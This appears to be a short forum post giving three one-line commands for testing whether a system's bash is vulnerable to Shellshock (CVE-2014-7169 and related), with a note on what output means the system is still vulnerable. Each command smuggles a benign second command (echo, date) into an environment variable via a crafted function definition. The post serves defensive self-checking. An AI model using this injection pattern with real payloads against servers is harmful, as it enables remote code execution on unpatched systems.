- Code: Select all
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Exploit 2 (CVE-2014-7169)
- Code: Select all
env var='() {(a)=>\' bash -c "echo date"; cat echo
If the above command outputs the current date (it may also show errors), you are still vulnerable.
Exploit 3 (???)
Here is another variation of the exploit.
- Code: Select all
env -i X=' () { }; echo hello' bash -c 'date'
It is bad if this produces "hello"